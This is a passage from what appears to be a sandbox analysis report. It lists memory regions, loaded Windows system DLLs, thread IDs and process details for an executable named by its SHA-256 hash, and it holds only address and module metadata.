start_va = 0x7ffa12d90000
end_va = 0x7ffa12da3fff
monitored = 0
entry_point = 0x7ffa12d952e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1161
start_va = 0x7ffa12db0000
end_va = 0x7ffa12dbffff
monitored = 0
entry_point = 0x7ffa12db56e0
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1162
start_va = 0x7ffa12dc0000
end_va = 0x7ffa12e0afff
monitored = 0
entry_point = 0x7ffa12dc35f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 1163
start_va = 0x7ffa12e10000
end_va = 0x7ffa12e1efff
monitored = 0
entry_point = 0x7ffa12e13210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 1164
start_va = 0x7ffa12e20000
end_va = 0x7ffa12e74fff
monitored = 0
entry_point = 0x7ffa12e37970
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 1165
start_va = 0x7ffa12e80000
end_va = 0x7ffa12f34fff
monitored = 0
entry_point = 0x7ffa12ec22e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 1166
start_va = 0x7ffa12f40000
end_va = 0x7ffa13106fff
monitored = 0
entry_point = 0x7ffa12f9db80
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1167
start_va = 0x7ffa13110000
end_va = 0x7ffa13126fff
monitored = 0
entry_point = 0x7ffa13111390
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 1168
start_va = 0x7ffa13130000
end_va = 0x7ffa13317fff
monitored = 0
entry_point = 0x7ffa1315ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1169
start_va = 0x7ffa13320000
end_va = 0x7ffa13389fff
monitored = 0
entry_point = 0x7ffa13356d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 1170
start_va = 0x7ffa13390000
end_va = 0x7ffa133d2fff
monitored = 0
entry_point = 0x7ffa133a4b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1171
start_va = 0x7ffa133e0000
end_va = 0x7ffa13465fff
monitored = 0
entry_point = 0x7ffa133ed8f0
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 1172
start_va = 0x7ffa13520000
end_va = 0x7ffa13b63fff
monitored = 0
entry_point = 0x7ffa136e64b0
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 1173
start_va = 0x7ffa13b70000
end_va = 0x7ffa13cb2fff
monitored = 0
entry_point = 0x7ffa13b98210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1174
start_va = 0x7ffa13cc0000
end_va = 0x7ffa13d5cfff
monitored = 0
entry_point = 0x7ffa13cc78a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1175
start_va = 0x7ffa13d60000
end_va = 0x7ffa13d67fff
monitored = 0
entry_point = 0x7ffa13d61ea0
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1176
start_va = 0x7ffa13d80000
end_va = 0x7ffa13ed5fff
monitored = 0
entry_point = 0x7ffa13d8a8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1177
start_va = 0x7ffa13ee0000
end_va = 0x7ffa14065fff
monitored = 0
entry_point = 0x7ffa13f2ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1178
start_va = 0x7ffa14070000
end_va = 0x7ffa140cafff
monitored = 0
entry_point = 0x7ffa140838b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1179
start_va = 0x7ffa14220000
end_va = 0x7ffa142c6fff
monitored = 0
entry_point = 0x7ffa1422b4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1180
start_va = 0x7ffa14340000
end_va = 0x7ffa145bcfff
monitored = 0
entry_point = 0x7ffa14414970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 1181
start_va = 0x7ffa145c0000
end_va = 0x7ffa146dbfff
monitored = 0
entry_point = 0x7ffa146002b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1182
start_va = 0x7ffa146e0000
end_va = 0x7ffa1474afff
monitored = 0
entry_point = 0x7ffa146f90c0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1183
start_va = 0x7ffa147c0000
end_va = 0x7ffa14880fff
monitored = 0
entry_point = 0x7ffa147e0da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1184
start_va = 0x7ffa14ba0000
end_va = 0x7ffa14bf1fff
monitored = 0
entry_point = 0x7ffa14baf530
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1185
start_va = 0x7ffa14c00000
end_va = 0x7ffa15028fff
monitored = 0
entry_point = 0x7ffa14c28740
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 1186
start_va = 0x7ffa15030000
end_va = 0x7ffa1508bfff
monitored = 0
entry_point = 0x7ffa1504b720
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 1187
start_va = 0x7ffa15090000
end_va = 0x7ffa15136fff
monitored = 0
entry_point = 0x7ffa150a58d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1188
start_va = 0x7ffa15160000
end_va = 0x7ffa1520cfff
monitored = 0
entry_point = 0x7ffa151781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1189
start_va = 0x7ffa15210000
end_va = 0x7ffa1676efff
monitored = 0
entry_point = 0x7ffa153711f0
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1190
start_va = 0x7ffa16770000
end_va = 0x7ffa16930fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1304
start_va = 0x430000
end_va = 0x430fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000430000"
filename = ""
Region:
id = 1442
start_va = 0x7200000
end_va = 0x72fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007200000"
filename = ""
Region:
id = 1443
start_va = 0x7300000
end_va = 0x73fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007300000"
filename = ""
Region:
id = 1444
start_va = 0x7400000
end_va = 0x74fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007400000"
filename = ""
Region:
id = 1445
start_va = 0x7500000
end_va = 0x75fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007500000"
filename = ""
Region:
id = 1446
start_va = 0x7600000
end_va = 0x76fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007600000"
filename = ""
Region:
id = 1447
start_va = 0x7700000
end_va = 0x77fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007700000"
filename = ""
Region:
id = 1614
start_va = 0x430000
end_va = 0x430fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000430000"
filename = ""
Region:
id = 1616
start_va = 0x7800000
end_va = 0x78fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007800000"
filename = ""
Region:
id = 1617
start_va = 0x430000
end_va = 0x431fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000430000"
filename = ""
Region:
id = 1618
start_va = 0x7900000
end_va = 0x79fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007900000"
filename = ""
Region:
id = 1619
start_va = 0x7a00000
end_va = 0x7afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007a00000"
filename = ""
Region:
id = 1620
start_va = 0x7b00000
end_va = 0x7bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007b00000"
filename = ""
Region:
id = 1621
start_va = 0xd40000
end_va = 0xdbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d40000"
filename = ""
Region:
id = 1622
start_va = 0x2fe0000
end_va = 0x305ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002fe0000"
filename = ""
Thread:
id = 28
os_tid = 0x11b4
Thread:
id = 29
os_tid = 0x970
Thread:
id = 30
os_tid = 0x984
Thread:
id = 31
os_tid = 0x5b4
Thread:
id = 32
os_tid = 0x524
Thread:
id = 33
os_tid = 0x7c0
Thread:
id = 34
os_tid = 0x78c
Thread:
id = 35
os_tid = 0x9fc
Thread:
id = 36
os_tid = 0x3b4
Thread:
id = 37
os_tid = 0x574
Thread:
id = 38
os_tid = 0x5b8
Thread:
id = 39
os_tid = 0x2d8
Thread:
id = 40
os_tid = 0xbc4
Thread:
id = 41
os_tid = 0x46c
Thread:
id = 42
os_tid = 0xf8
Thread:
id = 43
os_tid = 0x8c
Thread:
id = 44
os_tid = 0x18c
Thread:
id = 45
os_tid = 0x820
Thread:
id = 46
os_tid = 0x824
Thread:
id = 47
os_tid = 0x338
Thread:
id = 48
os_tid = 0x32c
Thread:
id = 49
os_tid = 0x7a0
Thread:
id = 50
os_tid = 0xa08
Thread:
id = 51
os_tid = 0xbac
Thread:
id = 52
os_tid = 0x430
Thread:
id = 53
os_tid = 0x47c
Thread:
id = 54
os_tid = 0xb88
Thread:
id = 55
os_tid = 0xbd8
Thread:
id = 56
os_tid = 0x5ec
Thread:
id = 57
os_tid = 0x780
Thread:
id = 58
os_tid = 0x5ac
Thread:
id = 59
os_tid = 0x728
Thread:
id = 60
os_tid = 0x5e0
Thread:
id = 61
os_tid = 0x508
Thread:
id = 62
os_tid = 0x4f8
Thread:
id = 63
os_tid = 0x7e4
Thread:
id = 64
os_tid = 0x7e0
Thread:
id = 65
os_tid = 0x7dc
Thread:
id = 66
os_tid = 0x7d8
Thread:
id = 67
os_tid = 0x7cc
Thread:
id = 68
os_tid = 0x7b0
Thread:
id = 69
os_tid = 0x788
Thread:
id = 70
os_tid = 0x744
Thread:
id = 71
os_tid = 0x448
Thread:
id = 72
os_tid = 0x6f8
Thread:
id = 73
os_tid = 0x6d4
Thread:
id = 74
os_tid = 0x648
Thread:
id = 75
os_tid = 0x640
Thread:
id = 76
os_tid = 0x62c
Thread:
id = 77
os_tid = 0x534
Thread:
id = 78
os_tid = 0x530
Thread:
id = 79
os_tid = 0x4a8
Thread:
id = 80
os_tid = 0x2ac
Thread:
id = 81
os_tid = 0x270
Thread:
id = 82
os_tid = 0x154
Thread:
id = 83
os_tid = 0x1b8
Thread:
id = 84
os_tid = 0x1bc
Thread:
id = 85
os_tid = 0x180
Thread:
id = 86
os_tid = 0x188
Thread:
id = 87
os_tid = 0x148
Thread:
id = 88
os_tid = 0x12c
Thread:
id = 89
os_tid = 0xfc
Thread:
id = 90
os_tid = 0x60
Thread:
id = 91
os_tid = 0x3f0
Thread:
id = 92
os_tid = 0x3e8
Thread:
id = 93
os_tid = 0x3cc
Thread:
id = 94
os_tid = 0x364
Thread:
id = 118
os_tid = 0xae4
Thread:
id = 119
os_tid = 0xaf8
Thread:
id = 120
os_tid = 0x830
Thread:
id = 121
os_tid = 0xb8
Thread:
id = 122
os_tid = 0x7d4
Thread:
id = 123
os_tid = 0x128
Thread:
id = 124
os_tid = 0x1354
Thread:
id = 125
os_tid = 0xe7c
Thread:
id = 126
os_tid = 0xe84
Thread:
id = 127
os_tid = 0xe88
Process:
id = "7"
image_name = "7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe"
filename = "c:\\users\\rdhj0cnfevzx\\desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe"
page_root = "0x7db02000"
os_pid = "0x1248"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0x1394"
cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe\""
cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1223
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1224
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1225
start_va = 0x40000
end_va = 0x54fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1226
start_va = 0x60000
end_va = 0x9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 1227
start_va = 0xa0000
end_va = 0x19ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 1228
start_va = 0x1a0000
end_va = 0x1a3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 1229
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001b0000"
filename = ""
Region:
id = 1230
start_va = 0x1c0000
end_va = 0x1c1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1231
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1232
start_va = 0x400000
end_va = 0x4d9fff
monitored = 1
entry_point = 0x4ac276
region_type = mapped_file
name = "7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe"
filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe")
Region:
id = 1233
start_va = 0x771d0000
end_va = 0x7734afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 1234
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 1235
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1236
start_va = 0x7fff0000
end_va = 0x7ffa1676ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 1237
start_va = 0x7ffa16770000
end_va = 0x7ffa16930fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1238
start_va = 0x7ffa16931000
end_va = 0x7ffffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00007ffa16931000"
filename = ""
Region:
id = 1239
start_va = 0x400000
end_va = 0x553fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 1241
start_va = 0x560000
end_va = 0x65ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000560000"
filename = ""
Region:
id = 1242
start_va = 0x640d0000
end_va = 0x6411ffff
monitored = 0
entry_point = 0x640e8180
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 1243
start_va = 0x64050000
end_va = 0x640c9fff
monitored = 0
entry_point = 0x64063290
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 1244
start_va = 0x76720000
end_va = 0x767fffff
monitored = 0
entry_point = 0x76733980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1245
start_va = 0x64120000
end_va = 0x64127fff
monitored = 0
entry_point = 0x641217c0
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 1246
start_va = 0x660000
end_va = 0x8bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000660000"
filename = ""
Region:
id = 1247
start_va = 0x76720000
end_va = 0x767fffff
monitored = 0
entry_point = 0x76733980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1248
start_va = 0x76910000
end_va = 0x76a8dfff
monitored = 0
entry_point = 0x769c1b90
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 1249
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1250
start_va = 0x7feb0000
end_va = 0x7ffaffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007feb0000"
filename = ""
Region:
id = 1251
start_va = 0x560000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1252
start_va = 0x650000
end_va = 0x65ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000650000"
filename = ""
Region:
id = 1253
start_va = 0x660000
end_va = 0x69ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000660000"
filename = ""
Region:
id = 1254
start_va = 0x6a0000
end_va = 0x79ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006a0000"
filename = ""
Region:
id = 1255
start_va = 0x7c0000
end_va = 0x8bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007c0000"
filename = ""
Region:
id = 1256
start_va = 0x743d0000
end_va = 0x74516fff
monitored = 0
entry_point = 0x743e1cf0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 1257
start_va = 0x74ab0000
end_va = 0x74bfefff
monitored = 0
entry_point = 0x74b66820
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 1258
start_va = 0x20000
end_va = 0x23fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 1259
start_va = 0x76600000
end_va = 0x7667afff
monitored = 0
entry_point = 0x7661e970
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 1260
start_va = 0x76a90000
end_va = 0x76b4dfff
monitored = 0
entry_point = 0x76ac5630
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 1261
start_va = 0x76cb0000
end_va = 0x76cf3fff
monitored = 0
entry_point = 0x76cc9d80
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 1262
start_va = 0x76c00000
end_va = 0x76cacfff
monitored = 0
entry_point = 0x76c14f00
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 1263
start_va = 0x73f00000
end_va = 0x73f1dfff
monitored = 0
entry_point = 0x73f0b640
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 1264
start_va = 0x73ef0000
end_va = 0x73ef9fff
monitored = 0
entry_point = 0x73ef2a00
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 1265
start_va = 0x76840000
end_va = 0x76897fff
monitored = 0
entry_point = 0x768825c0
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")
Region:
id = 1266
start_va = 0x74eb0000
end_va = 0x762aefff
monitored = 0
entry_point = 0x7506b990
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 1270
start_va = 0x71340000
end_va = 0x7135afff
monitored = 0
entry_point = 0x71349050
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")
Region:
id = 1271
start_va = 0x76800000
end_va = 0x76836fff
monitored = 0
entry_point = 0x76803b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")
Region:
id = 1272
start_va = 0x745b0000
end_va = 0x74aa8fff
monitored = 0
entry_point = 0x747b7610
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")
Region:
id = 1273
start_va = 0x762b0000
end_va = 0x7646cfff
monitored = 0
entry_point = 0x76392a10
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")
Region:
id = 1274
start_va = 0x76d00000
end_va = 0x76d44fff
monitored = 0
entry_point = 0x76d1de90
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 1275
start_va = 0x76d50000
end_va = 0x76d5bfff
monitored = 0
entry_point = 0x76d53930
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")
Region:
id = 1276
start_va = 0x74520000
end_va = 0x745acfff
monitored = 0
entry_point = 0x74569b90
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")
Region:
id = 1277
start_va = 0x76470000
end_va = 0x764b3fff
monitored = 0
entry_point = 0x76477410
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")
Region:
id = 1278
start_va = 0x73f20000
end_va = 0x73f2efff
monitored = 0
entry_point = 0x73f22e40
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 1279
start_va = 0x73f30000
end_va = 0x73f8efff
monitored = 0
entry_point = 0x73f34af0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")
Region:
id = 1280
start_va = 0x717a0000
end_va = 0x7191dfff
monitored = 0
entry_point = 0x7181c630
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")
Region:
id = 1281
start_va = 0x73b80000
end_va = 0x73e4afff
monitored = 0
entry_point = 0x73dbc4c0
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")
Region:
id = 1282
start_va = 0x74dc0000
end_va = 0x74eaafff
monitored = 0
entry_point = 0x74dfd650
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 1283
start_va = 0x76be0000
end_va = 0x76bf2fff
monitored = 0
entry_point = 0x76be1d20
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll")
Region:
id = 1288
start_va = 0x76680000
end_va = 0x76711fff
monitored = 0
entry_point = 0x766b8cf0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 1289
start_va = 0x73f90000
end_va = 0x74107fff
monitored = 0
entry_point = 0x73fe8a90
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")
Region:
id = 1290
start_va = 0x764c0000
end_va = 0x764cdfff
monitored = 0
entry_point = 0x764c5410
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")
Region:
id = 1291
start_va = 0x764d0000
end_va = 0x764d5fff
monitored = 0
entry_point = 0x764d1460
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")
Region:
id = 1292
start_va = 0x6ec40000
end_va = 0x6ec54fff
monitored = 0
entry_point = 0x6ec45210
region_type = mapped_file
name = "samcli.dll"
filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll")
Region:
id = 1293
start_va = 0x1d0000
